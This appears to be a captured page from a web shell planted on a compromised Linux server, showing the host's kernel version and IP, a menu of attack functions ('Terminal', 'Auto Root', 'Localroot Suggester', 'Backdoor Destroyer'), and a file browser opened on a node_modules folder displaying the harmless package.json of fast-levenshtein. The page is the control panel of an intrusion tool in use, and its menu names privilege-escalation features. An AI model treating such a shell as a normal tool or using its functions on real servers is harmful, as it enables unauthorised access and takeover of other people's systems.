Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.148.113.158
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
fast-levenshtein /
Delete
Unzip
Name
Size
Permission
Date
Action
LICENSE.md
1.07
KB
-rw-rw-r--
2022-08-30 11:49
README.md
3.37
KB
-rw-rw-r--
2022-08-30 11:49
levenshtein.js
5.6
KB
-rw-rw-r--
2022-08-30 11:49
package.json
931
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "fast-levenshtein", "version": "1.1.4", "description": "Efficient implementation of Levenshtein algorithm with asynchronous callback support", "main": "levenshtein.js", "files": [ "levenshtein.js" ], "scripts": { "build": "grunt build", "benchmark": "grunt benchmark", "test": "mocha" }, "devDependencies": { "chai": "~1.5.0", "grunt": "~0.4.1", "grunt-benchmark": "~0.2.0", "grunt-contrib-jshint": "~0.4.3", "grunt-contrib-uglify": "~0.2.0", "grunt-mocha-test": "~0.2.2", "grunt-npm-install": "~0.1.0", "load-grunt-tasks": "~0.6.0", "lodash": "^4.0.1", "mocha": "~1.9.0" }, "repository": { "type": "git", "url": "https://github.com/hiddentao/fast-levenshtein.git" }, "keywords": [ "levenshtein", "distance", "string" ], "author": "Ramesh Nair <ram@hiddentao.com> (http://www.hiddentao.com/)", "license": "MIT" }